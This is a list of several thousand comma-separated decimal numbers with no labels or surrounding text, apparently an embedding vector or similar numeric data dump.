-0.039209067821502686, 0.033341675996780396, -0.007582592777907848, -0.010919864289462566, 0.009243467822670937, -0.0047808364033699036, -0.020349599421024323, 0.020116765052080154, -0.030221715569496155, 0.032844964414834976, 0.04377259314060211, -0.016981281340122223, -0.02118779718875885, 0.006371861323714256, 0.007706770207732916, -0.021280931308865547, -0.06953943520784378, 0.007900797761976719, -0.006042014807462692, -0.019852887839078903, -0.04898804798722267, -0.038557134568691254, -0.03911593183875084, 0.01576278917491436, 0.003263541730120778, -0.015351451933383942, 0.030221715569496155, -0.015025485306978226, 0.00810258649289608, -0.045293767005205154, -0.031075436621904373, -0.018378280103206635, 0.012976556085050106, -0.012844616547226906, 0.00039411825127899647, 0.0178194809705019, 0.032472435384988785, -0.013574160635471344, 0.01656218245625496, 0.005735451355576515, -0.02454059198498726, 0.02429223619401455, 0.04026457667350769, -0.00232056831009686, 0.001042897580191493, 0.010167038068175316, 0.038712356239557266, 0.01483145821839571, 0.009072723798453808, -0.0007179015665315092, 0.015731746330857277, -0.015553239732980728, 0.0031180211808532476, 0.005805301014333963, -0.0012408054899424314, -0.04507645592093468, -0.012091790325939655, 0.03393151983618736, -0.01892155595123768, 0.013900126330554485, -0.05324112996459007, -0.03275183215737343, -0.020644519478082657, 0.007268268149346113, -0.018285145983099937, 0.0071285683661699295, -0.03417987376451492, 0.017043370753526688, -0.0368807353079319, -0.0013048346154391766, 0.027365630492568016, -0.024012837558984756, -0.034086741507053375, 0.011626124382019043, -0.02292628400027752, 0.04606987535953522, -0.009732416830956936, -0.030252760276198387, 0.010966431349515915, 0.01955796591937542, 0.013954454101622105, 0.013783710077404976, -0.01296103373169899, -0.03827773407101631, -0.023516125977039337, 0.0077339340932667255, -0.053551577031612396, -0.018673202022910118, -0.036973871290683746, 0.014264898374676704, -0.004912775009870529, -0.02379552647471428, 0.011571796610951424, -0.015180707909166813, 0.032348256558179855, -0.03300018981099129, -0.017260681837797165, 0.05662497133016586, 0.013155060820281506, -0.005522021092474461, -0.007656323257833719, -0.015498912893235683, 0.020271988585591316, -0.0009162946371361613, -0.01376818772405386, -0.017353814095258713, -0.009895400144159794, 0.009786744602024555, 0.01881290040910244, 0.029880227521061897, -0.017415903508663177, 0.04395885765552521, -0.05022982507944107, -0.007947363890707493, -0.008467357605695724, -0.0011709555983543396, -0.009647044353187084, -0.020520342513918877, 0.0034148830454796553, 0.044051989912986755, 0.0025204166304320097, 0.012285818345844746, 0.017400382086634636, -0.01508757472038269, 0.03924011066555977, -0.04364841431379318, -0.016515616327524185, -0.05035400390625, 0.00897182896733284, -0.011044042184948921, -0.04563525691628456, 0.012611784040927887, -0.02131197415292263, 0.005502618383616209, -0.0307649914175272, 0.00030753351165913045, -0.0023011656012386084, 0.011486425064504147, -0.002559222048148513, -0.03526642918586731, -0.04824298620223999, -0.03182050213217735, -0.020256465300917625, -0.02170003019273281, 0.029073072597384453, 0.046783898025751114, -0.012658351100981236, -0.000311656593112275, -0.02494416944682598, -0.0063369362615048885, -0.04004726558923721, 0.009693611413240433, 0.01732277125120163, -0.006961704697459936, -0.009235706180334091, 0.0374084934592247, 0.024245670065283775, 0.000015484300092794, 0.027877863496541977, 0.0039212945848703384, -0.041816797107458115, -0.014784891158342361, 0.019216477870941162, -0.015739506110548973, 0.01116045843809843, 0.010671509429812431, 0.011261353269219398, 0.013224910944700241, -0.018843945115804672, 0.03861922398209572, -0.009910921566188335, -0.03979891166090965, 0.021498240530490875, -0.048677604645490646, -0.00258832611143589, -0.019728710874915123, 0.0478704534471035, 0.012076267972588539, -0.02544087916612625, -0.03237929940223694, 0.007931842468678951, 0.0060885814018547535, -0.02156032994389534, 0.005673362407833338, 0.004307409282773733, -0.011990896426141262, 0.009817788377404213, -0.0011990895727649331, 0.013318044133484364, 0.008319896645843983, -0.002306986367329955, 0.005099041387438774, 0.008490640670061111, -0.0073458789847791195, -0.020132288336753845, 0.007714531384408474, -0.005681123584508896, -0.01574726775288582, 0.011944329366087914, 0.017726346850395203, -0.03377629816532135, 0.02879367396235466, -0.029864704236388206, -0.01594129577279091, -0.03065633587539196, 0.031246179714798927, 0.016344871371984482, -0.008933023549616337, 0.008948545902967453, -0.027256974950432777, -0.017493514344096184, 0.005382321309298277, 0.03964368626475334, 0.0006461113807745278, 0.0008799144998192787, -0.0019034092547371984, -0.014808175154030323, 0.015623089857399464, -0.028250396251678467, -0.0004273454542271793, -0.00554918497800827, -0.015514434315264225, 0.01892155595123768, -0.006313653197139502, -0.02691548690199852, -0.007093643303960562, 0.016655316576361656, 0.05156473442912102, -0.003969801589846611, -0.012821333482861519, -0.013985498808324337, 0.03467658534646034, 0.03200676664710045, 0.017012326046824455, -0.03126170113682747, 0.02631012164056301, -0.02703966572880745, 0.002908471506088972, -0.023003894835710526, 0.01632934994995594, 0.006236042361706495, -0.009235706180334091, 0.0007048047264106572, -0.002246837830170989, -0.004548003431409597, -0.04324483871459961, 0.021963907405734062, 0.024152535945177078, -0.007749456446617842, 0.030873646959662437, 0.04877074062824249, -0.01383027620613575, 0.01296879444271326, -0.029352473095059395, 0.005847987253218889, 0.01708993688225746, 0.02854531817138195, -0.022507183253765106, -0.007753336802124977, 0.0037777144461870193, 0.01402430422604084, 0.031354837119579315, -0.014792652800679207, 0.014878024347126484, -0.006034253630787134, 0.0073148347437381744, 0.0099730109795928, -0.0014066989533603191, -0.017493514344096184, 0.0031684681307524443, 0.007730053272098303, 0.014528775587677956, 0.0006723051192238927, -0.007970647886395454, 0.011928807012736797, -0.004012487828731537, -0.0000953766138991341, 0.0006640589563176036, -0.009895400144159794, 0.005087399855256081, 0.010555093176662922, -0.0012320743408054113, -0.01109836995601654, -0.0051029217429459095, 0.009507345035672188, 0.0014658774016425014, 0.0065814112313091755, -0.036694470793008804, 0.017509037628769875, 0.009453017264604568, -0.004373378586024046, 0.029243817552924156, 0.024633724242448807, -0.01767978072166443, -0.03442823141813278, 0.04532480984926224, -0.039457421749830246, -0.006887974217534065, -0.0326276570558548, 0.0020877353381365538, 0.006181714590638876, 0.004311290103942156, -0.02393522672355175, -0.0005524931475520134, -0.005778137594461441, 0.013799232430756092, 0.08797980844974518, 0.010120471939444542, -0.0011030460009351373, 0.04262394830584526, 0.010213605128228664, 0.012184923514723778, -0.011230308562517166, 0.010562853887677193, 0.021886296570301056, -0.029212772846221924, 0.016888149082660675, -0.02916620671749115, 0.0010467780521139503, 0.047156430780887604, 0.024851035326719284, -0.03858817741274834, -0.012316862121224403, -0.023345382884144783, -0.02166898548603058, -0.005459932144731283, -0.004311290103942156, -0.01029121596366167, -0.006488278042525053, -0.013853559270501137, 0.023873137310147285, -0.004346214700490236, -0.01445892546325922, -0.008808845654129982, -0.05010564625263214, -0.00688409386202693, -0.0009861445287242532, 0.036973871290683746, -0.02292628400027752, 0.01769530400633812, 0.016608748584985733, 0.01308521069586277, 0.017757391557097435, 0.013985498808324337, -0.003108319593593478, -0.035452693700790405, 0.027955474331974983, 0.0224295724183321, 0.027241453528404236, -0.015390257351100445, 0.0008857353241182864, 0.004842924885451794, -0.019914977252483368, -0.00859153550118208, -0.014039825648069382, -0.02143615297973156, 0.016422482207417488, -0.0037078645545989275, 0.009080484509468079, 0.018378280103206635, 0.00762915937229991, 0.011820152401924133, -0.005910076200962067, 0.028390096500515938, 0.022522706538438797, -0.015925772488117218, 0.026372211053967476, 0.003541000885888934, 0.02044273167848587, -0.017881570383906364, 0.013038644567131996, 0.012604023329913616, -0.008754518814384937, 0.001489160698838532, -0.017353814095258713, 0.004128904081881046, -0.00810258649289608, 0.0187973789870739, -0.03684969246387482, 0.004606211557984352, 0.0023050459567457438, -0.008661385625600815, -0.004350095521658659, 0.0007334237452596426, 0.03126170113682747, 0.02540983445942402, -0.0009284213301725686, 0.04253081604838371, -0.017152026295661926, -0.0122780567035079, -0.010042861104011536, 0.01646905019879341, -0.02120331861078739, -0.019542444497346878, -0.017540080472826958, 0.004408303648233414, 0.01831619068980217, -0.02044273167848587, 0.011602841317653656, 0.02843666262924671, -0.012751484289765358, -0.012084029614925385, -0.04901909455657005, 0.006690066307783127, 0.018766334280371666, 0.04808776080608368, 0.0187973789870739, 0.02592206746339798, 0.016872627660632133, 0.010749120265245438, -0.0013775948900729418, -0.025766845792531967, -0.03613567352294922, 0.02505282312631607, -0.002324448898434639, -0.006759916432201862, -0.003021007403731346, -0.031323790550231934, 0.0010458079632371664, 0.013038644567131996, 0.035825226455926895, 0.031479012221097946, -0.011874480172991753, 0.000029210224965936504, -0.005642318166792393, -0.025999678298830986, 0.0058130621910095215, 0.016996804624795914, -0.04728060960769653, -0.009887638501822948, -0.0072333430871367455, 0.038184601813554764, 0.0016055770684033632, 0.020147809758782387, 0.01340341567993164, -0.011439858004450798, 0.019402744248509407, -0.02093944139778614, -0.012836855836212635, -0.005293068941682577, -0.008094824850559235, 0.0047420309856534, -0.010958670638501644, -0.014722802676260471, 0.016158604994416237, 0.012557456269860268, 0.03042350336909294, -0.03889862075448036, -0.023655826225876808, 0.0156929399818182, 0.030314847826957703, -0.0028813076205551624, -0.02790890820324421, -0.011424335651099682, 0.02142062969505787, 0.005192174576222897, 0.01906125620007515, -0.02131197415292263, -0.021032575517892838, -0.02354717068374157, 0.016174128279089928, -0.004970983136445284, 0.03203781321644783, -0.01833171397447586, -0.016360394656658173, 0.01895260065793991, -0.005933359265327454, -0.030578725039958954, -0.0037001033779233694, 0.0014435641933232546, -0.021731074899435043, 0.005083519034087658, -0.0076912478543818, 0.024012837558984756, -0.0025960872881114483, -0.015141901560127735, -0.022103607654571533, 0.016003383323550224, 0.0016734867822378874, -0.05553841590881348, 0.04448661208152771, 0.006461114156991243, 0.007861992344260216, -0.020644519478082657, 0.02542535588145256, -0.006527083460241556, -0.007543787360191345, -0.0011942388955503702, 0.02306598238646984, 0.019961543381214142, 0.02964739315211773, 0.011059564538300037, -0.02430775947868824, 0.0017035609344020486, 0.007050957530736923, -0.01659322716295719, -0.009833310730755329, -0.007947363890707493, -0.023624781519174576, -0.01046972069889307, -0.019356178119778633, 0.000705774815287441, -0.00804825872182846, 0.020039154216647148, -0.012549695558845997, 0.007741695269942284, 0.006018731277436018, -0.015824878588318825, 0.00965480599552393, -0.0153824957087636, 0.0030423502903431654, 0.006142909172922373, -0.034955985844135284, 0.052309799939394, -0.022833149880170822, 0.0020372881554067135, 0.03601149469614029, -0.007182896137237549, 0.008513924665749073, -0.05134742334485054, -0.0034963747020810843, 0.00535903824493289, 0.024525068700313568, 0.0011117772664874792, 0.010298976674675941, 0.020411686971783638, -0.023842092603445053, 0.006092461757361889, -0.03827773407101631, 0.023764481768012047, -0.009546150453388691, 0.0024913123343139887, -0.02418358065187931, 0.02703966572880745, -0.02592206746339798, 0.01657770574092865, 0.006915138103067875, -0.03622880578041077, -0.005754854064434767, -0.035080160945653915, 0.021855251863598824, -0.04147530719637871, -0.0007605875725857913, 0.021839728578925133, 0.03039245866239071, -0.0020159452687948942, 0.015700701624155045, 0.03039245866239071, -0.01783500239253044, 0.0023457917850464582, -0.012285818345844746, 0.01334132719784975, -0.00026994067593477666, -0.019790800288319588, 0.04877074062824249, 0.0059255980886518955, -0.03228616714477539, -0.014497730880975723, 0.0005088369944132864, -0.01957348920404911, -0.009429734200239182, -0.027753686532378197, -0.01521175168454647, -0.0122780567035079, -0.006915138103067875, 0.012130595743656158, -0.018642157316207886, -0.024105969816446304, -0.0022274351213127375, 0.008948545902967453, -0.025968633592128754, -0.006608574651181698, -0.02106362022459507, 0.0030035448726266623, -0.0015483390307053924, -0.0028114577289670706, -0.003956219647079706, 0.00779214221984148, 0.022491661831736565, -0.023143593221902847, -0.0018975884886458516, -0.001415430218912661, 0.010950908996164799, -0.011106130667030811, 0.00013800202577840537, 0.005137846805155277, -0.0079357223585248, -0.018409324809908867, 0.005277546588331461, 0.040947552770376205, -0.012728200294077396, -0.031075436621904373, 0.0008537207613699138, -0.02593758888542652, -0.013612966053187847, -0.007369162514805794, 0.004501436837017536, -0.016344871371984482, 0.042313504964113235, -0.004416064824908972, 0.004225917626172304, -0.005044713616371155, -0.003017126815393567, -0.016531137749552727, 0.006317533552646637, -0.00219833105802536, 0.023624781519174576, -0.005347396247088909, -0.02156032994389534, -0.017276203259825706, -0.01609651744365692, 0.0005073818028904498, 0.012860138900578022, 0.03331063315272331, -0.004676061682403088, 0.012084029614925385, -0.00885541271418333, 0.01668636128306389, -0.00632141437381506, -0.03219303488731384, -0.030097536742687225, -0.005258143879473209, 0.026760265231132507, 0.018145447596907616, 0.01595681719481945, 0.013038644567131996, 0.008180197328329086, -0.019914977252483368, 0.026403255760669708, -0.02020989917218685, -0.011416574940085411, -0.013038644567131996, -0.00663961935788393, -0.038060422986745834, 0.015467868186533451, 0.020877353847026825, 0.006073059048503637, -0.016655316576361656, 0.0027901146095246077, 0.028964417055249214, -0.025859978049993515, 0.01116045843809843, -0.030749469995498657, -0.007019912824034691, -0.013488788157701492, -0.014389075338840485, -0.037067003548145294, 0.009584955871105194, -0.022383006289601326, 0.002306986367329955, -0.01570846140384674, -0.006080820225179195, 0.03554582968354225, 0.03005097061395645, 0.01844036765396595, 0.03362107649445534, -0.00004283762245904654, 0.011323441751301289, -0.008940785191953182, 0.017120981588959694, -0.0022526585962623358, 0.007811544928699732, -0.025518490001559258, -0.03188259154558182, -0.011540752835571766, -0.03610462695360184, -0.00722946273162961, 0.018781857565045357, -0.01264282874763012, 0.03337272256612778, -0.0003870847576763481, 0.0019984827376902103, -0.02005467750132084, -0.015017724595963955, -0.016267260536551476, -0.01730724796652794, 0.025471923872828484, -0.020287510007619858, 0.006344697438180447, -0.00542112672701478, 0.01584816165268421, -0.006573650054633617, -0.0017821420915424824, -0.00816467497497797, -0.020535865798592567, 0.0025165360420942307, 0.01695023849606514, -0.06475859880447388, 0.0294300839304924, -0.017245160415768623, 0.012898944318294525, -0.013481027446687222, -0.011796868406236172, -0.0307649914175272, -0.012790289707481861, -0.02343851514160633, -0.015972338616847992, 0.018781857565045357, 0.005122324451804161, 0.0224295724183321, 0.02554953470826149, 0.02565819025039673, -0.030935736373066902, 0.005040833260864019, -0.017369337379932404, -0.0067987218499183655, -0.006790960673242807, -0.010167038068175316, 0.009251228533685207, 0.0214516744017601, -0.026511911302804947, -0.011486425064504147, -0.008824368007481098, 0.009041679091751575, -0.0020237062126398087, -0.006585291586816311, 0.021482719108462334, 0.015514434315264225, 0.0027008620090782642, 0.010368826799094677, -0.01868872344493866, -0.0024951929226517677, 0.01693471521139145, 0.0120995519682765, 0.009771222248673439, -0.008413029834628105, -0.011773585341870785, 0.009010634385049343, -0.001692889491096139, 0.007900797761976719, -0.009499583393335342, -0.06066074222326279, -0.038805488497018814, 0.015483390539884567, 0.024385370314121246, 0.016857104375958443, -0.0288091953843832, -0.014381314627826214, -0.00859929621219635, 0.00013448527897708118, 0.010671509429812431, 0.014800413511693478, -0.009592716582119465, -0.0029763809870928526, 0.01844036765396595, 0.0052154576405882835, 0.06413771212100983, -0.005735451355576515, -0.004982624668627977, -0.008094824850559235, 0.002611609408631921, 0.005607393104583025, 0.002260419772937894, 0.022957326844334602, 0.012456562370061874, -0.011711496859788895, 0.012891183607280254, 0.021374063566327095, -0.01500996295362711, 0.006534844636917114, -0.027086231857538223, 0.0007921170326881111, 0.011734779924154282, 0.011796868406236172, -0.011990896426141262, -0.014699519611895084, -0.013240433298051357, -0.0022914642468094826, 0.005685004405677319, -0.012223728932440281, 0.0068220049142837524, -0.023516125977039337, -0.008273330517113209, -0.009002873674035072, 0.0011767764808610082, -0.011711496859788895, 0.0168415829539299, -0.0013436400331556797, -0.03650820627808571, 0.013550876639783382, 0.017400382086634636, -0.010454199276864529, 0.004218156915158033, -0.017136504873633385, -0.018378280103206635, 0.005452171433717012, 0.008684668689966202, -0.014528775587677956, -0.022351961582899094, 0.0037466699723154306, 0.020256465300917625, 0.0836956799030304, 0.04799462854862213, -0.02565819025039673, 0.002064452040940523, -0.014326986856758595, -0.01126911398023367, 0.01221596822142601, 0.0032266764901578426, 0.008024975657463074, -0.016795014962553978, 0.020271988585591316, 0.0018083357717841864, -0.01133120246231556, -0.010593898594379425, -0.015141901560127735, -0.0025960872881114483, 0.00972465518862009, -0.016795014962553978, -0.005199935752898455, 0.02540983445942402, 0.0001292707893298939, 0.012914466671645641, 0.027613986283540726, -0.033714208751916885, 0.0038068185094743967, -0.024214625358581543, 0.002429223619401455, 0.0018490816000849009, -0.016996804624795914, -0.019775277003645897, 0.00821900274604559, 0.01705889403820038, 0.00985659472644329, -0.003139364067465067, 0.013310282491147518, 0.004947700072079897, 0.02815726399421692, -0.015755029395222664, 0.0014775190502405167, 0.00476919487118721, 0.0032907056156545877, -0.0040318905375897884, 0.024990735575556755, -0.015343690291047096, 0.00043486402137205005, -0.020116765052080154, 0.020535865798592567, 0.005056355148553848, -0.00013484907685779035, -0.016795014962553978, -0.020349599421024323, -0.024742379784584045, 0.027645030990242958, 0.0338694304227829, -0.016282783821225166, 0.012743722647428513, -0.006631858181208372, -0.021156752482056618, 0.006290369667112827, -0.03889862075448036, 0.021125707775354385, 0.008063781075179577, 0.015312646515667439, 0.008327658288180828, -0.021855251863598824, 0.006569769233465195, -0.012037462554872036, 0.004540242254734039, 0.010586137883365154, 0.019899455830454826, 0.0031626473646610975, -0.028095174580812454, -0.0016172187170013785, -0.009352123364806175, -0.010415392927825451, 0.011106130667030811, -0.030966781079769135, 0.0074467733502388, -0.009926443919539452, -0.004159948322921991, 0.024199103936553, 0.016639793291687965, -0.001787962974049151, 0.0010011816630139947, -0.01066374871879816, -0.005044713616371155, 0.004307409282773733, 0.006759916432201862, -0.007547667715698481, -0.030252760276198387, 0.00804825872182846, 0.009592716582119465, 0.03517329692840576, 0.0003926630597561598, -0.0028638450894504786, -0.010981953702867031, 0.004125023726373911, 0.003323690267279744, -0.021141231060028076, -0.01029121596366167, 0.006433950271457434, -0.00278817443177104, 0.01769530400633812, 0.014156242832541466, -0.021358542144298553, 0.016779493540525436, 0.011944329366087914, 0.013977737165987492, 0.0245561134070158, 0.0049903858453035355, -0.017493514344096184, 0.0015570702962577343, 0.011633886024355888, -0.03560791537165642, 0.009196900762617588, -0.014707280322909355, -0.004043532069772482, 0.011866718530654907, 0.0031975724268704653, -0.013418938033282757, -0.02381104789674282, -0.0002810972509905696, 0.004346214700490236, -0.05907747894525528, -0.0005272696143947542, -0.00672887172549963, -0.01476936973631382, -0.008770040236413479, 0.015398018062114716, 0.02020989917218685, 0.04364841431379318, 0.010392109863460064, 0.009887638501822948, -0.012821333482861519, 0.04274812713265419, -0.03678760305047035, 0.0016569944564253092, 0.012441040016710758, 0.009321078658103943, 0.031059913337230682, -0.011509708128869534, 0.022646883502602577, -0.010655987076461315, 0.006492158398032188, 0.031090958043932915, -0.011688213795423508, -0.016795014962553978, 0.012316862121224403, 0.006107984110713005, 0.0203030314296484, 0.0036089105997234583, 0.0013232672354206443, 0.03622880578041077, 0.004381139762699604, 0.019014690071344376, 0.013574160635471344, 0.03684969246387482, -0.00810258649289608, -0.0122780567035079, -0.0020993768703192472, -0.022383006289601326, 0.017384858801960945, 0.025270134210586548, -0.004877849947661161, -0.007559309247881174, 0.014435642398893833, -0.011012997478246689, -0.03861922398209572, -0.022755539044737816, -0.022398527711629868, -0.0013921469217166305, 0.010826731100678444, -0.008312135934829712, -0.0006334996432997286, -0.009941966272890568, -0.009274511598050594, -0.01595681719481945, -0.020908398553729057, -0.013612966053187847, -0.0034168234560638666, -0.024028358981013298, -0.014606386423110962, -0.016748448833823204, -0.0066939471289515495, 0.035204339772462845, 0.0006921929307281971, 0.013217149302363396, -0.03237929940223694, -0.02180868573486805, 0.000004744577381643467, 0.022631362080574036, 0.03275183215737343, -0.0023826570250093937, -0.01576278917491436, -0.016344871371984482, -0.001182597246952355, 0.008374224416911602, -0.00594888161867857, 0.0008731235284358263, -0.0104619599878788, 0.017788436263799667, 0.001086553675122559, -0.007547667715698481, -0.008560490794479847, 0.023888658732175827, -0.006030373275279999, -0.006546486169099808, -0.003554582828655839, -0.010073904879391193, -0.010974192060530186, -0.016857104375958443, -0.0009259959915652871, 0.013147300109267235, 0.03951951116323471, 0.012122835032641888, 0.03461449593305588, -0.0000971956251305528, -0.020039154216647148, 0.011882240884006023, 0.03489389643073082, -0.005937240086495876, 0.012130595743656158, -0.002722205128520727, 0.019790800288319588, -0.010671509429812431, -0.04125799611210823, 0.044672880321741104, 0.011129414662718773, 0.01029121596366167, 0.007144090719521046, 0.028467707335948944, 0.02554953470826149, 0.029973359778523445, -0.002338030841201544, 0.0007169314194470644, 0.022615838795900345, 0.002580564934760332, -0.017602169886231422, 0.023842092603445053, -0.008746757172048092, 0.01035330444574356, 0.023531649261713028, -0.03604253754019737, 0.0006999539909884334, -0.0015260258223861456, -0.00022325283498503268, 0.015157423913478851, 0.04489019140601158, -0.005584110040217638, 0.008405269123613834, -0.028855761513113976, 0.03130826726555824, -0.00008440193778369576, -0.007986169308423996, -0.005735451355576515, 0.009546150453388691, 0.01477713044732809, -0.012681634165346622, 0.020411686971783638, -0.03709804639220238, 0.014730563387274742, -0.002801756374537945, -0.010337782092392445, -0.00300548505038023, -0.009064962156116962, 0.015227274037897587, 0.008723474107682705, -0.0019111703149974346, -0.017757391557097435, 0.026154899969697, -0.02466476894915104, 0.007054837886244059, -0.02218121849000454, 0.02554953470826149, -0.02691548690199852, 0.02381104789674282, -0.0019208716694265604, -0.021032575517892838, -0.008296613581478596, 0.002968620043247938, 0.0199460219591856, 0.015545479021966457, -0.011579558253288269, -0.00977898295968771, -0.010981953702867031, 0.01414848119020462, 0.005537543445825577, -0.009196900762617588, -0.020116765052080154, -0.008250047452747822, 0.01302312221378088, -0.0010933446465060115, -0.017493514344096184, -0.02319016121327877, 0.024494023993611336, 0.011439858004450798, -0.013201627880334854, 0.05941896513104439, 0.021855251863598824, -0.013325804844498634, 0.007221701554954052, -0.002532058162614703, 0.0011806570691987872, 0.017260681837797165, 0.01008942723274231, 0.004043532069772482, 0.0032829444389790297, -0.0012107312213629484, 0.019232001155614853, 0.008288852870464325, 0.027877863496541977, -0.015894727781414986, -0.014730563387274742, -0.02317463792860508, 0.012891183607280254, 0.007893036119639874, -0.0018888572230935097, 0.006596933118999004, 0.00890974048525095, -0.014683997258543968, 0.0023826570250093937, 0.023888658732175827, 0.019852887839078903, -0.04638032242655754, -0.00009780195978237316, -0.030842602252960205, -0.0013999079819768667, 0.008925262838602066, -0.009375406429171562, -0.004288006573915482, 0.03998517617583275, 0.011765824630856514, 0.004881730768829584, -0.0037718936800956726, 0.006480516865849495, 0.0019732590299099684, 0.001030285726301372, 0.03889862075448036, -0.0063873836770653725, -0.025130435824394226, -0.013915648683905602, -0.006290369667112827, -0.022786583751440048, -0.02342299371957779, -0.00616619223728776, 0.0013475206214934587, 0.025021780282258987, -0.003909653052687645, -0.00451307836920023, -0.00520381610840559, -0.0035817467141896486, -0.02542535588145256, -0.015793833881616592, -0.008669146336615086, 0.011253591626882553, 0.004008607007563114, -0.003659357549622655, -0.015366973355412483, -0.018409324809908867, -0.011688213795423508, 0.002256539184600115, -0.013628487475216389, -0.03028380312025547, -0.007687367498874664, -0.04116486385464668, 0.021901817992329597, -0.014924591407179832, -0.013931171037256718, 0.0036438354291021824, -0.0013581921812146902, -0.020722132176160812, 0.0005956642562523484, -0.009127051569521427, 0.018859468400478363, -0.017260681837797165, 0.04212724044919014, 0.01893707923591137, 0.0010234947549179196, -0.02079974301159382, 0.01657770574092865, 0.024633724242448807, -0.010601659305393696, 0.019356178119778633, -0.01172701921314001, -0.019992588087916374, -0.019247522577643394, -0.014094153419137001, 0.02120331861078739, -0.0061196256428956985, -0.009872116148471832, 0.042934391647577286, 0.027613986283540726, -0.015506673604249954, 0.03042350336909294, 0.002190569881349802, 0.003319809678941965, -0.0005335754831321537, 0.008405269123613834, -0.018533501774072647, 0.006146789528429508, 0.019977066665887833, 0.03712909296154976, -0.0032713026739656925, 0.010966431349515915, 0.015134140849113464, -0.026403255760669708, 0.000827041978482157, -0.024012837558984756, 0.005906195379793644, -0.02665160968899727, 0.020597953349351883, -0.02345403842628002, 0.023842092603445053, -0.009142572991549969, -0.009274511598050594, -0.00576649559661746, 0.0049671027809381485, 0.0055647073313593864, -0.0015774430939927697, 0.0006412607035599649, -0.008265568874776363, -0.0014270718675106764, -0.012549695558845997, -0.011789107695221901, 0.017012326046824455, 0.001112747355364263, 0.023097027093172073, -0.04352423548698425, -0.0069345408119261265, 0.03750162571668625, -0.015273841097950935, 0.014707280322909355, -0.0011137175606563687, 0.015180707909166813, -0.009740177541971207, -0.03961264342069626, 0.003129662713035941, 0.002376836258918047, 0.012448800727725029, -0.008506163023412228, -0.015095335431396961, -0.0039581600576639175, -0.007955125533044338, -0.0039814431220293045, 0.009142572991549969, 0.004125023726373911, -0.009561672806739807, 0.0050718775019049644, 0.012378951534628868, 0.0032538403756916523, 0.022351961582899094, -0.0032868250273168087, -0.0203030314296484, -0.009569433517754078, 0.011882240884006023, 0.00781930610537529, 0.02342299371957779, -0.021591374650597572, -0.008172435685992241, -0.010485243052244186, 0.013527593575417995, -0.033838387578725815, 0.018874989822506905, -0.008754518814384937, 0.004928297363221645, 0.007089762948453426, 0.004000845830887556, -0.037315357476472855, 0.0022837030701339245, -0.030733946710824966, 0.019759755581617355, 0.0009943906916305423, 0.013387894257903099, -0.0006592082791030407, -0.012045224197208881, -0.01476936973631382, -0.02093944139778614, -0.007477817591279745, 0.029073072597384453, 0.00333339162170887, 0.009134812280535698, 0.017291726544499397, -0.0004843410279136151, -0.006752155255526304, -0.011432097293436527, 0.04597674310207367, -0.0031587667763233185, 0.03666342794895172, -0.0079357223585248, 0.02269344963133335, -0.0025436999276280403, 0.009196900762617588, -0.0224295724183321, 0.002722205128520727, -0.0005655899876728654, 0.009018396027386189, 0.005017549730837345, 0.036321938037872314, 0.009414211846888065, 0.00940645020455122, -0.005541423801332712, 0.014125198125839233, 0.0030404101125895977, -0.011688213795423508, 0.0005796569748781621, 0.004346214700490236, 0.0020023633260279894, 0.01757112517952919, 0.02306598238646984, 0.004536361899226904, 0.021032575517892838, -0.011183742433786392, 0.006080820225179195, 0.013869081623852253, 0.009212423115968704, 0.01084225345402956, -0.010392109863460064, 0.0011612542439252138, -0.023733437061309814, -0.004509198013693094, 0.011191503144800663, 0.010143755003809929, 0.0008726384257897735, -0.011866718530654907, 0.01594129577279091, 0.011478663422167301, -0.016360394656658173, -0.0004874939622823149, 0.0019111703149974346, -0.0009555851574987173, 0.004284126218408346, 0.007190657313913107, 0.0006170072592794895, -0.02905755117535591, 0.006352458614856005, 0.006022612098604441, -0.003537120297551155, -0.004074576310813427, -0.012557456269860268, -0.0019373641116544604, 0.004800239112228155, -0.012014179490506649, 0.003267422318458557, 0.0037214464973658323, -0.0022759418934583664, -0.027520854026079178, 0.020892875269055367, -0.02281762845814228, -0.018719768151640892, 0.027970997616648674, -0.03275183215737343, -0.014583103358745575, 0.005805301014333963, -0.003490553703159094, 0.006430069450289011, 0.004008607007563114, -0.004870088770985603, 0.008832129649817944, -0.023950748145580292, 0.007520503830164671, -0.020287510007619858, 0.009189140051603317, 0.020101243630051613, 0.01216164045035839, -0.0005651049432344735, 0.00048773648450151086, 0.0020838547497987747, 0.01583264023065567, -0.011789107695221901, -0.020613476634025574, -0.007439012173563242, 0.0037641325034201145, -0.022708972916007042, 0.01767978072166443, -0.0029627990443259478, 0.011827913112938404, -0.013915648683905602, 0.009235706180334091, 0.022398527711629868, 0.014218331314623356, 0.02494416944682598, 0.0015871445648372173, -0.012262534350156784, -0.01476936973631382, 0.010818970389664173, 0.0018180371262133121, 0.01743142493069172, -0.0010555093176662922, -0.025518490001559258, 0.002384597435593605, -0.01178134698420763, 0.0002963769366033375, 0.010430915281176567, -0.005855748429894447, -0.015529956668615341, 0.004982624668627977, -0.012262534350156784, 0.012169401161372662, -0.00885541271418333, -0.0035565230064094067, -0.011354486458003521, 0.011820152401924133, -0.0045868088491261005, -0.009678089059889317, -0.009988533332943916, 0.03250347822904587, -0.0045790476724505424, -0.010850015096366405, -0.031199613586068153, -0.012084029614925385, 0.02631012164056301, -0.012572978623211384, 0.010050621815025806, 0.012464323081076145, 0.019635576754808426, 0.018005747348070145, 0.009584955871105194, -0.0016851284308359027, -0.00703931599855423, -0.01708993688225746, 0.005502618383616209, 0.006453352980315685, -0.0020237062126398087, 0.013046405278146267, 0.0019422147888690233, 0.004090098664164543, 0.014451163820922375, 0.008987351320683956, 0.0021653464064002037, -0.019728710874915123, 0.01806783676147461, -0.005735451355576515, 0.0187973789870739, -0.0026484746485948563, 0.006853049620985985, 0.021591374650597572, -0.0029977241065353155, 0.01583264023065567, -0.021343018859624863, -0.0034575690515339375, 0.0078076645731925964, -0.014070870354771614, -0.0033993609249591827, 0.0006393204093910754, -0.018145447596907616, 0.000848385039716959, 0.007442892994731665, 0.017602169886231422, -0.0058945538476109505, 0.0007373042753897607, 0.022398527711629868, 0.010493004694581032, 0.012565217912197113, -0.006243803072720766, -0.004365617409348488, -0.02655847743153572, -0.02216569520533085, -0.020489297807216644, 0.011051803827285767, 0.01780395768582821, 0.009375406429171562, -0.00429576775059104, 0.00971689447760582, 0.0007819306338205934, 0.00604977598413825, 0.011719257570803165, -0.002619370585307479, -0.025254612788558006, -0.0007858111639507115, 0.03237929940223694, -0.006616335827857256, 0.021141231060028076, 0.011338964104652405, 0.011307919397950172, -0.006562008056789637, -0.004047412425279617, -0.002475790213793516, 0.002425343031063676, -0.01892155595123768, 0.0059255980886518955, 0.0003446412447374314, 0.001030285726301372, -0.0058130621910095215, -0.004260842688381672, -0.026775788515806198, -0.010073904879391193, 0.01643800549209118, 